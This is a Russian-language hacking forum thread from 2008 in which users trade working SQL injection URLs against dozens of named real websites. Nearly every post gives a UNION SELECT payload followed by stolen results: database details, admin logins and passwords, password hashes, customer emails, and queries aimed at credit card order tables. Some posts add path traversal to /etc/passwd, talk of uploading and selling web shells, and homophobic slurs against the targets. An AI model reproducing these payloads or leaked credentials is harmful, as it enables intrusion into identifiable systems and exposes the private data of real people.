08.12.2008, 12:34
http://www.liberte-economie.com/edit.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7,8,9,10,11,12,13--
5.0.51a-log - economie_base@localhost - economie
facebook.com
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,VERS ION(),2,3,4--
Version: 5.0.67-community
facebook.com
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,VERS ION(),2,3,4--
Version: 5.0.67-community
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,user name,2,3,password%20from%20users%20limit%201,1
Хмм.. это не сам facebook..
http://affinispace.com/facebook/
http://www.soulmenace.com
http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,3,4,5,6,7--
Версия оказалась 4.0.27-standard и пришлось подбирать вручную.
Нашел таблицу prarez_soul.user, в ней подобрал имена: username и password. Вытащил логин с пассом:
http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,concat_ws(username,0x3a,passwor d),4,5,6,7+from+prarez_soul.user--
prarez : djbamix
вход:
http://www.soulmenace.com/login.php
-m0rgan-
08.12.2008, 18:49
http://printer.konicaminoltaeurope.com/be/fr/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+m ysql.user--&PHPSESSID=66fba6d0283e0b2c99df64e3249e6916
логин/пасс:
admin:6d8369a953851a24
root:6d8369a953851a24
--------------------------------------------------------
http://www.beethovenmusic.nl/news.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9+from+user--
логин/пасс:
admin:nevets1
--------------------------------------------------------
The End!
masternet
08.12.2008, 22:30
http://www.smeda.org/info.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18--
4.0.17-log - root@localhost - smeda_main01
pr - 5
тИЦ - 20
-m0rgan-
09.12.2008, 00:23
http://www.e-linebv.nl/news.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,user,password),13,14,15,16+from+mysql.user--
логин/пасс:
root:05764bd379f12110
---------------------------------------------------------------
http://www.factorydirect.nl/news.php?id=-8+union+select+1,concat_ws(0x3a,log,pass),3,4+from +login--
логин/пасс:
tyra:f@ctorydirect.nl
---------------------------------------------------------------
http://www.waterpoortboys.nl/news.php?id=-8+union+select+1,concat_ws(0x3a,username,password) ,3,4+from+admins--
логин/пасс:
Alco:da77e9894373dc42c7d83650b5c3f9c2
---------------------------------------------------------------
The End!
Один шоп с картоном, второй не юзал основательно.
http://www.212dressingroom.com/purchasingguide.php?id=-1+union+select+1,concat_ws(0x3a3a,id,userid,orderd ate,shippingcharge,shippingmethoad,promocodeid,tot al,grandtotal,ccname,cctype,ccnumber,ccmonth,ccyea r,cvv,orderstatus,ispaid,fname,mname,lname,address 1,address2,city,state,country,zipcode,day_telephon e,evening_telephone,companyname,ship_fname,ship_mn ame,ship_lname,ship_address1,ship_address2,ship_ci ty,ship_state),3+from+ordermaster--
http://shop.genusdigital.com/content.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,ID,Billing Name,BillingHName,BillingAddress1,BillingAddress2, BillingCity,BillingPin,BillingCountry,BillingPhone ,BillingEmail,ShippingName,ShippingHName,ShippingA ddress1,ShippingAddress2,ShippingCity,ShippingPin, ShippingCountry,ShippingPhone,ShippingEmail,OrderD ate,ShippingCost,TransactionStatus,TransactionTota l,TransactionTimeStamp,TransactionChargeType,Trans actionECIStatus,TransactionCardPrefix,OrderSession ),6,7+from+orders--
Thrasher88
09.12.2008, 01:20
www.citymix.ru - интернет-магазин одежды
http://www.citymix.ru/info.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6/*
Version: 5.0.27-log
User: citymix@localhost
Database: citymix
"Аренда интернет магазина" (Не сайт, а одна сплошная дырка)
http://www.indsite.ru/index.php?object=magazin&id_content=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37--
2-ое поле принтабельно.
5-ая ветка.
Админка:
http://www.indsite.ru/im_index.php?file=input1.php
info41 : 1
Ну и:
http://www.indsite.ru/index.php?object=korzina&id0=36687&operation=../../../../../../../../etc/passwd
Thrasher88
09.12.2008, 10:43
Помогите, пожалуйста, вынуть логин и пасс юзеров.
Вот скуля:
http://gta.com.ua/file_details.phtml?id=-1'
Список полей в таблице mtl_users:
http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,column_name,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20+from+information_schema. columns+where+table_name=0x6d746c5f7573657273--
Дальше пытаюсь вывести содержимое полей вот так:
http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,concat_ws(username,0x3a,passw ord),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+fr om+mtl_users--
Но ничего не выходит! Вылазит ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gtacom/domains/gta.com.ua/public_html/inc/files_details.html on line 155
Что делать? Как просмотреть данные ролей? Пробовал шифровать название таблицы, колонок (на всякий случай), заменять плюсы на просто пробелы и на /**/ - все равно не выводится :(
И не удивительно, ведь таблица mtl_users - пустая.
http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,concat_ws(0x2f,table_name,tab le_rows),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0+from+information_schema.tables+limit+36,1--
masternet
09.12.2008, 12:23
http://www.lifeskillstraining.com/faq.php?id=-6+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4--
4.1.20 - lifeskillsdb@dedicated.papercuststudio.com - nhpa
http://rolemancer.ru/sections.php?op=viewarticle&artid=-666+union+all+select+1,2,concat(name,0x3a,0x3a,pas s),4,5,6,7,8,9,10,11,12,13+from+users+limit+0,1/* qwe::qw99ngkCljbZI
DJ.KilleR
09.12.2008, 17:07
http://www.nskfitness.ru/articles.php?cat_id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11 --
5.0.67:sibdetiru@78.108.81.131:sibdetiru_nskfit
Cennarios
09.12.2008, 20:49
http://www.autobaza.ro/car_details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,concat_ws(0x3a3a,user,passwo rd),24,25+from+users+limit+0,1--
login: andrei
pass: andrei17
http://www.autobaza.ro/admin/
Админим ушлепков....
Cennarios
09.12.2008, 21:16
http://www.targetonline.ro/large_picture.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,adminu ser_name,adminuser_password,adminuser_level),8+fro m+adminuser+limit+0,1--
login Liviu
pass a
http://www.targetonline.ro/admin
И еще один гомо-портал )) на закуску
Thrasher88
09.12.2008, 21:36
www.wargames.ru
http://www.wargames.ru/sections.php?op=listarticles&secid=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database())--
4.1.7:wargames@localhost:Wargames
http://www.rochester.edu/news/show.php?id=3136+and+substring(@@version,1,1)=3 - blind sql
http://www.rochester.edu/news/show.php?id=3136+and+substring(@@version,1,1)=4 - ошибка
http://new.groteck.ru/rss/?site_id=-1+union+select
можно раскрутить? или это просто бага?
xena-mil1
10.12.2008, 10:51
http://www.herpconstrust.org.uk/news/expand-news.php?id=9999%20union%20select%201,2,3,4,versio n(),6,7,8
http://www.name.net/marketplace/search-domains.php?sub_category=999999%20union%20select%2 01,2,3,4,version(),6,7,8,9,10,11,12,13,14
http://www.name.net/marketplace/search-domains.php?sub_category=999999%20union%20select%2 01,2,3,4,concat(username,char(0x27),password),6,7, 8,9,10,11,12,13,14%20from%20account
tbl:account,domain
name.net'*F4A92A0B0992BFEB56A81F234194BA8E4A010283 6 purchase | make offer
owenb'*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
кто сбрутит пмните мне
http://www.asf.ca/news.php?id=9999%20uNion%20select%201,version(),3, 4,5,6,7
http://www.atlantasilverbacks.com/news/displaynews.php?id=9999%20union%20select%201,2,ver sion(),4,5,6,7,8,9,10,11,12
masternet
10.12.2008, 11:55
http://www.thecorporatelibrary.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,4 5,32),version(),user(),database()),10,11,12,13,14, 15,16,17,18--
5.0.51b-community-nt - tcorplib@132102-APP1 - tclib
Список таблиц из information_schema:
-------
1:CHARACTER_SETS
2:COLLATIONS
3:COLLATION_CHARACTER_SET_APPLICABILITY
4:COLUMNS
5:COLUMN_PRIVILEGES
6:KEY_COLUMN_USAGE
7:PROFILING
8:ROUTINES
9:SCHEMATA
10:SCHEMA_PRIVILEGES
11:STATISTICS
12:TABLES
13:TABLE_CONSTRAINTS
14:TABLE_PRIVILEGES
15:TRIGGERS
16:USER_PRIVILEGES
17:VIEWS
18:tcompanies
19:address
20:address2cart
21:calendar_events
22:cart
23:cart_bak
24:cartcc
25:category
26:change_log
27:company_bak
28:info
29:link
30:link_cat
31:news
32:news_categories
33:person
34:product
35:product2cart
36:product2cart_bak
37:product2category
38:product_bak
39:promotion
40:recommendations
41:site_section
42:state
43:subscription
44:testimonial
45:users
46:users_bak
--------------------------------------
http://www.roguegovernment.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10--
4.1.22-standart - roguegov_publicr@localhost-roguegov_rgov
----------------------------------------
http://www.monitor-nhsft.gov.uk/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19--
5.0.54 - monitor@localhost - nhsftreg
---------------------------------------------------
http://en.apa.az/news.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8,9,10,11,12,13,14, 15,16--
5.0.67-community - apaadm_user@localhost - apaadm_en
------------
p.s. спите что ли?инъекций чо т мало выложено за сёдня..
http://www.electionguide.org/country-news.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50--
версия 4.1.22
юзер eguide@localhost
зы: цыфарка 3 экранируется в титле
masternet
10.12.2008, 19:54
http://www.archdioceseofcolombo.com/news.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7,8,9,10,11,12,13--
4.1.20-max-log - rajindu_frsunil@71.18.216.39 - rajindu_bishop
---------------------
http://www.northwestu.edu/news/news.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7,8,9,10,11,12--
5.0.45-community-nt - root@localhost - news
----------------------
http://www.entrepreneurship.appstate.edu/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6--
4.1.22 - entrepreneur@localhost - entrepreneur
---------------------
http://www.eiu.edu/~slo/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5--
4.1.22-log - slo@localhost - slo
-------------------------------------
http://www.sinfonie-hausverwaltung.de/news.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7,8,9,10,11,12,13,14, 15--
4.0.18 - sinfonie@localhost - sinfonie
---------------------------
http://svpressa.ru/issue/news.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20--
5.0.51a-log - svpressa@localhost - svpressa
-----------------
http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8--
4.1.21-log - trudinfo@localhost - trudinfo_db
---------------------
http://www.astrakhanfm.ru/news/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7--
4.0.24-standart-log -astrakhanru@localhost -astrakhanru
------------------------
http://www.fmaestro.ru/news.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),ve rsion(),user(),database()),6--
4.0.23-standard - fmaestro1@localhost - db_fmaestro1
http://new.groteck.ru/rss/?site_id=-1+union+select
можно раскрутить? или это просто бага?
http://new.groteck.ru/rss/?site_id=-1+union+select +1,2,3,4--
Поля 3 и 4 принтабельны.
Version() - 5.0.45-log
================================================== ==
"Лучший сайт Будапешта в интернете"
http://budapest-town.net/index.php?module=news&target=article&type=&category=&id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--
Version() - 4.1.22
Префикс таблиц tps_
admin/217a968c3f6a1d9d9cf8784d1c83ca43 : tibor
================================================== ==
"TOP-MANAGER [ журнал для руководителей ]"
http://www.top-manager.ru/?a=1&number=-1+union+select+1,2,3,concat_ws(0x2f,table_name,tab le_rows,table_schema),5,6+from+information_schema. tables--
Журнал "Чайка"
PR:3 тИЦ:500
http://www.chayka.org/article.php?id=-872+union+select+1,2,3,4,5,6,7,8,9,10,11--
seagullmag@localhost:seagullmag:5.0.51a
Кавычки не фильтруются, но load_file не доступен.
Т.к. 5 версия можно перебирать таблицы...
Я нашел таблицу: ibf_members
P.S Вот, что я еще нашел)) http://www.chayka.org/db.inc. Ошибка вылетеле при заходе в /images/
spherics
11.12.2008, 03:53
http://www.msfacts.org/online_newsDetails.php?ID=-123+union+select+1,2,version(),user(),5,database()/*
version:4.0.24-standard
user:root@localhost
database:msf_db
С мускула логин и пароль
root:SQLadmin
Cennarios
11.12.2008, 04:42
Е***шим по беспределу буржуйские чаты....
Вроде как сексуальные меньшинства там еще тусуются!!!
Смело помогаем админить этот отвратительный ресурс!!!
http://www.prassel.nu/index.php?page=ads&adno=-1+union+select+concat_ws
(0x3a3a,name,password,email),2,3+from+user+limit+1 ,1--
login:mats
pass:lkll00lkll00
masternet
11.12.2008, 12:19
http://www.greetingcard.org/about.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10--
5.0.67 - greetingcard@localhost - greetingcard_org_-_maindb
--------------------------------
http://www.simonsig.co.za/about.php?id=-1+union+select+1,concat_ws(char(3245,32),version() ,user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--
5.0.51a-3ubuntu5.1-log�? simonsig@web-02.adept.co.za�? simonsig
-------------------
http://catalog.belstrin.ru/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24--
4.1.21-standard-log - clclon_user@localhost - clclon_catalogbelstrin
---------------------------
http://vis.vis-belogorje.ru/site.php?id=-1+union+select+concat_ws(char(32,45,32),version(%2 0),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24--
4.1.21-standard-log - clclon_user@localhost - clclon_visbelogorje
-----------------------------
_http://rifma.ru
http://rifma.ru/rifma.php?curr_node=55+union+select+1,concat(user_ name,char(58),user_password),3,4,5,6,7,8+from+user s+limit+0,1/*
Скуля есть, но вывод не сделал есть фильтрация в параметре "curr_node". Если не сложно подскажите как обойти.
Заранее спасибо.
masternet
11.12.2008, 21:25
http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9--
5.0.27-standard-log - WebUser@localhost - cgsc
PR: 6
-------------------------
http://www.adilsoz.kz/site.php?id=7&lan=english&newsid=-1+union+select+concat_ws(char(32,45,32),version(), user(),database())--
5.0.41-community-nt - adilsoz@localhost - adilsoz
ТИЦ: 160
PR: 2
-----------------------
http://www.oxygenna.com/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8--
5.0.27-community-nt - oxygenna@localhost - oxygenna
PR: 3
--------------------
http://epodsolar.com/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
4.1.20 - epodsol_usr1@localhost - epodsol_cm
PR: 5
-------------------
http://gavlab.auburn.edu/about.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4--
4.1.22-log - gavlab@web1.duc.auburn.edu - gavlab
PR: 4
--------------------
http://www.swiss.org.nz/home.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,4 5,32),version(),user(),database()),10,11,12,13,14, 15,16,17,18,19--
4.1.21-standard-log - swisst@117.104.160.18 - swisst db
ТИЦ : 10 PR: 4
----------------------
http://www.poveditions.com/home.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
ТИЦ : 10 PR: 4
----------------------
masternet, в http://cgsc2.biology.yale.edu кавычки не фильтруются и file priv разрешен. Найдешь путь - зальешь шелл))
masternet
11.12.2008, 23:56
masternet, в http://cgsc2.biology.yale.edu кавычки не фильтруются и file priv разрешен. Найдешь путь - зальешь шелл))
а как путь узнать?вот в чём вопрос..так бы уже залил и продал)
у меня в дампере также..
Y - file priv
Jokester
12.12.2008, 00:26
masternet,
Тема не для вопросов и комментариев
Tigger
С чего ты взял, что file_priv Y ?
http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,file_priv,3,4,5,6,7,8,9+from+mysq l.user+where+user='WebUser'--
"N"
http://boutique.toutec.fr/lire/index.php?rubid=-1+union+select+1,2,null,4,unhex(hex(concat_ws(char (32,45,32),version(),user(),database()))),6,7,8,9, 0--version( 5.0.15-standard )
user( toutec@localhost )
database( toutec )http://boutique.toutec.fr/lire/index.php?rubid=-1+union+select+1,2,null,4,unhex(hex(concat_ws(char (32,45,32),table_name,column_name))),6,7,8,9,0+fro m+information_schema.columns--##########
http://www.webridershop.com/boutik/lire/index.php?rubid=-1+union+select+1,2,null,unhex(hex(concat_ws(char(3 2,45,32),version(),user(),database()))),5,null,7,8--version( 4.1.15-Debian_1ubuntu5-log )
user( webrider@localhost )
database( webridershop )
##############
http://www.compasdigital.be/lire/index.php?rubid=24+union+select+1,concat_ws(char(3 2,45,32),version(),user(),database()),3--version( 4.1.22-log )
user( formule19@10.0.0.78 )
database( formule19 )
pr7 похоже на форум международного оператора сотовой связи Оранж, но мб и ошибаюсь.
http://forum.orange.fr/liremessages.php?idsection=1828[SQL]&thread=10743
Db: bddforums
Version: 4.1.11-Debian_4sarge7-log
User: forums@fofo05wb.b1.woo
Cennarios
12.12.2008, 14:18
http://www.pcr.org.ar/hoy.php?id_nota=-1+union+select+concat_ws(0x3a3a,usuario,clave)+fro m+usuarios+limit+0,1/*
login: tansimPLE
pass: IHfr78MET
Админка
http://www.pcr.org.ar/admin/_administrar.php?area=nomenclador
Коммуняки плиять...
Cennarios
12.12.2008, 14:51
http://www.exoticangkor.com/hotels.php?city_id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,username,p assword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26+from+tbl_user+limit+0,1--
http://www.exoticangkor.com/admin/
Баанк!! (Co Джей иМолчаливый Боб)
-----------------------------------------------------------
http://www.trinergy.at/pop_lexikon.php?id=-1+union+select+1,concat_ws(0x3a3a,username,passwor d),3,4+from+users+limit+0,1/*
http://www.trinergy.at/admin
login:CW
pass:CW
Куяк!!!!
---------------------------------------------------------
spherics
12.12.2008, 17:52
Магазинчик...
http://www.zakaz.kr.ua/vitrina/tovar/?lev1=9&lev2=12&lev3=17&id=-170/**/UNION/**/SELECT/**/AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626 567696E,(SELECT/**/CONCAT(id,0x7873716C696E6A64656C,login,0x7873716C6 96E6A64656C,pass,0x7873716C696E6A64656C,mymail)/**/FROM/**/zakazkr_zakaz.customers/**/LIMIT/**/5,1),0x7873716C696E6A656E64),0x71),0x71),2,3,4,5,6 ,7,8,9,10,11,12,13--
Добил их пользователей много всех не стал кому надо далее сам...
[1]:6:karlsson:5a89ed8db9c4a2a2406d570da13e2560:karls son@dela.kr.ua
[2]:7:test:c4ca4238a0b923820dcc509a6f75849b:serge@del a.kr.ua 1
[3]:8:vitaliy:12d72e349bedf045166bf79ae9c66242:vitali y@shtorm.com passwd:0708gw
[4]:9:amigo:a9de3c617cb8e7fab847b08ea1a80e42:amigo@ki rovograd.info passwd:g-shock
[5]:10:lelikx:42019dd47db5aeed2091398fadea7c0b:lelikx @ukr.net passwd:666123
[6]:11:vovan-bmw:8ebfbd869222118c7716a8e87c94dde2:agroteh@romb. net
[7]:12:Хохол:ca56097a3dc3bf5e0626c4da3c84d7a4:ch _vas@ukr.net passwd:180297
[8]:13:artur:c9b5ecdf0b853aab02103542187ea208:artur@r omb.net passwd:artur
[9]:14:asd:cb2c631d23f3e2f9a5d79171c8c1d141:asd@romb. net
[10]:15:xXx:a4f59177af1c5586e49c16a142b2a793:
[11]:16:dimitrius:6e8b08a1285fda750437a1677b0d3286:dim itriusf@rambler.ru
[12]:17:Igor:8b65ac266262fd4f65e1d4a169fedbfd:goshka@r omb.net passwd:311181
[13]:18:Garik:7b90ad7525dbd9a141f76f47f2dd7da5:garikwo rk@rambler.ru
[14]:19:SNIPER:67c6a1e7ce56d3d6fa748ab6d9af3fd7:obit@k v.ukrtel.net passwd:47
Адрес: www.wbdg.org (74.205.45.163)
Google PR 7 / 10
Яндекс тІЦ 60
http://www.wbdg.org/ccb/browse_cat.php?o=29&c=-4+union+select+concat_ws(0x3a3a,database(),version (),user()),2--
Database Version: 5.0.67
Database name: ccb
User name: webscript@localhost
Cennarios
12.12.2008, 19:12
http://www.nrru.ac.th/web/healthcenter/main.php?pack=readnews&news_id=-1+union+select+1,user_name,3,user_pass,5,6,7,8+fro m+core_user+limit+0,1/*
http://www.nrru.ac.th/web/healthcenter/admin/main.php
login: admin
pass: 12345678
Арабикан гомикас похекас!!! lol
http://www.globalresearch.ca/PrintArticle.php?articleId=1+union+select+1,concat _ws(0x3a,VERSION(), USER(), DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52/*
5.0.24a-log:u70167021@cgihost:d60162207
Dimi4,
Сдампленные база.таблица:
bsa.bsa_pages
bsa.products
bsa.products_join
bsa.program
bsa.projects
bsa.projects_bak
bsa.sp_expt_join
bsa.speaker_expertise
bsa.speakers
bsa.users
bsa.users_allowed
ccb.UFGS_old
ccb.UFGS_old1
ccb.ccb_category
ccb.ccb_documents
ccb.ccb_library
ccb.ccb_org
ccb2.UFGS_old
ccb2.UFGS_old1
ccb2.ccb_category
ccb2.ccb_documents
ccb2.ccb_library
ccb2.ccb_org
cs_training.course
cs_training.pages
cs_training.users
gsa_rat.answers
gsa_rat.assessments
gsa_rat.project
gsa_rat.questions
gsa_rat.section
gsa_rat.team_members
gsa_rat.users
mysql.columns_priv
mysql.db
mysql.func
mysql.help_category
mysql.help_keyword
mysql.help_relation
mysql.help_topic
mysql.host
mysql.proc
mysql.procs_priv
mysql.tables_priv
mysql.time_zone
mysql.time_zone_leap_second
mysql.time_zone_name
mysql.time_zone_transition
mysql.time_zone_transition_type
mysql.user
navfac.active_exams
navfac.answers
navfac.bookmarks
navfac.certificates
navfac.cnt_content_blocks
navfac.cnt_disciplines
navfac.cnt_exercises
navfac.cnt_modules
navfac.cnt_obj_disciplines
navfac.cnt_reading_blocks
navfac.cnt_tasks
navfac.exams
navfac.hibernate_unique_key
navfac.questions
navfac.report_card_hist
navfac.roles
navfac.user_answers
navfac.user_answers_history
navfac.user_info
navfac.user_roles
ncs.affiliate_sales
ncs.affiliates
ncs.ballots
ncs.ballots_questions
ncs.ballots_users
ncs.eligible_ballots_users
ncs.officer_ballot
ncs.questions
ncs.task_teams
ncs.users
ncs.votes
ncsforum.usebb_badwords
ncsforum.usebb_bans
ncsforum.usebb_cats
ncsforum.usebb_forums
ncsforum.usebb_members
ncsforum.usebb_moderators
ncsforum.usebb_posts
ncsforum.usebb_searches
ncsforum.usebb_sessions
ncsforum.usebb_stats
ncsforum.usebb_subscriptions
ncsforum.usebb_topics
ncsstore.ds_admin_failed_attempts
ncsstore.ds_admin_password_history
ncsstore.ds_admins
ncsstore.ds_affiliate_payout
ncsstore.ds_affiliates
ncsstore.ds_blocked_ips
ncsstore.ds_cart_files
ncsstore.ds_cart_options
ncsstore.ds_carts
ncsstore.ds_categories
ncsstore.ds_category_crumb_trails
ncsstore.ds_countries
ncsstore.ds_coupon_categories
ncsstore.ds_coupon_membership
ncsstore.ds_coupon_products
ncsstore.ds_coupon_vendors
ncsstore.ds_coupons
ncsstore.ds_currencies
ncsstore.ds_customer_cards
ncsstore.ds_customer_reward_points
ncsstore.ds_customers
ncsstore.ds_download_keys
ncsstore.ds_emails
ncsstore.ds_gateway_settings
ncsstore.ds_gateways
ncsstore.ds_gift_certs
ncsstore.ds_language_categories
ncsstore.ds_language_page_contents
ncsstore.ds_language_photos
ncsstore.ds_language_product_option_labels
ncsstore.ds_language_product_options
ncsstore.ds_language_products
ncsstore.ds_languages
ncsstore.ds_newsletter
ncsstore.ds_newsletter_queue
ncsstore.ds_option_groups
ncsstore.ds_options
ncsstore.ds_order_credits
ncsstore.ds_order_taxes
ncsstore.ds_orders
ncsstore.ds_page_contents
ncsstore.ds_photos
ncsstore.ds_pricing_group
ncsstore.ds_pricing_group_categories
ncsstore.ds_product_categories
ncsstore.ds_product_download_files
ncsstore.ds_product_group_pricing
ncsstore.ds_product_pricing
ncsstore.ds_product_reviews
ncsstore.ds_product_timelines
ncsstore.ds_products
ncsstore.ds_products_cross_sell
ncsstore.ds_protx
ncsstore.ds_registries
ncsstore.ds_registry_items
ncsstore.ds_search_groups
ncsstore.ds_searches
ncsstore.ds_settings
ncsstore.ds_shipping
ncsstore.ds_simplified_columns
ncsstore.ds_state_taxes
ncsstore.ds_states
ncsstore.ds_subscription_carts
ncsstore.ds_subscription_countries
ncsstore.ds_subscription_orders
ncsstore.ds_subscription_timelines
ncsstore.ds_tax
ncsstore.ds_tax_rates
ncsstore.ds_text
ncsstore.ds_tmp_tracking
ncsstore.ds_top_sellers
ncsstore.ds_vendors
ncsstore.ds_widgets
ncsstore.ds_wishlists
ncsstore.se_keyword_values
ncsstore.se_keywords
ncsstore.se_session
urchin.uaccounts
urchin.uaccounts_permissions
urchin.ufilters
urchin.ufilters_permissions
urchin.ugeo_tasks
urchin.ugeo_tasks_permissions
urchin.uglobals
urchin.uglobals_permissions
urchin.ugoals
urchin.ugoals_permissions
urchin.ugroups
urchin.ugroups_permissions
urchin.ugroups_uusers
urchin.ugroups_uusers_permissions
urchin.ulogs
urchin.ulogs_permissions
urchin.ulogs_ufilters
urchin.ulogs_ufilters_permissions
urchin.uprofiles
urchin.uprofiles_permissions
urchin.uprofiles_queue
urchin.uprofiles_queue_permissions
urchin.uprofiles_tasks
urchin.uprofiles_tasks_permissions
urchin.uprofiles_ufilters
urchin.uprofiles_ufilters_permissions
urchin.uprofiles_ugroups
urchin.uprofiles_ugroups_permissions
urchin.uprofiles_ulogs
urchin.uprofiles_ulogs_permissions
urchin.uprofiles_uusers
urchin.uprofiles_uusers_permissions
urchin.usessions
urchin.usessions_permissions
urchin.uusers
urchin.uusers_permissions
wbdg.agencies
wbdg.caac
wbdg.caac_docs
wbdg.caac_docs_comments
wbdg.calendar
wbdg.ccbcategories
wbdg.ce_testinfo
wbdg.ce_tests
wbdg.ce_users
wbdg.countries
wbdg.cwm_options
wbdg.cwm_recordOptions
wbdg.cwm_records
wbdg.cwm_users
wbdg.documents
wbdg.dodihs
wbdg.epa_greenguide
wbdg.epa_greenspec
wbdg.events
wbdg.leed
wbdg.mandates
wbdg.masterformat
wbdg.mf_div
wbdg.organizations
wbdg.relations
wbdg.spie
wbdg.states
wbdg.tools
wbdg.tools_categories
wbdg.wbdg_pages
wbdg.zipData
http://www.icompositions.com/music/showcat.php?cid=-1+union+select+concat_ws(0x3a,version(),database() ,user())--
4.1.22-standard:ic_music:ic@localhost
[x26]VOLAND
12.12.2008, 19:28
http://www.wbdg.org/ccb/admin/index.php
Но она какая то кривая =/
http://www.cactuslove.ru/su_big_foto.php?imgid=350'/**/union/**/select/**/1,2,concat_ws(0x3a,login,password,nick),4,5/**/from/**/cactuslove/**/limit/**/1,1/*
Яндекс тИЦ: 1400
Database: cactuslove
Version: 5.0.32-Debian_7etch8-log
User: cactus_user@localhost
masternet
12.12.2008, 23:12
http://www.hasznaltautokereskedok.hu/see.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,concat_ws(char(32,45,32),ver sion(),user(),database()),24,25,26,27,28,29,30,31, 32,33--
5.0.32-Debian_7etch5-log - root@localhost - hauto
pr- 3
---------------------------
http://www.avaria-auto.ru/see.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17--
4.1.22-standard-log - avariaau_auto@localhost - avariaau_autolen
pr - 3
ChaaK, Dimi4,
в продолжение:
http://www.wbdg.org/ccb/browse_cat.php?o=29&c=-4+union+select+concat_ws(user,0x3a,password),2+fro m+mysql.user+where+user='root'--
root:*347372949FBE1B252E308137EA426D7307712EC8
ChaaK, почему-то тогда не искалось оО, а сейчас есть :)
http://www.mojo-jojo.lv
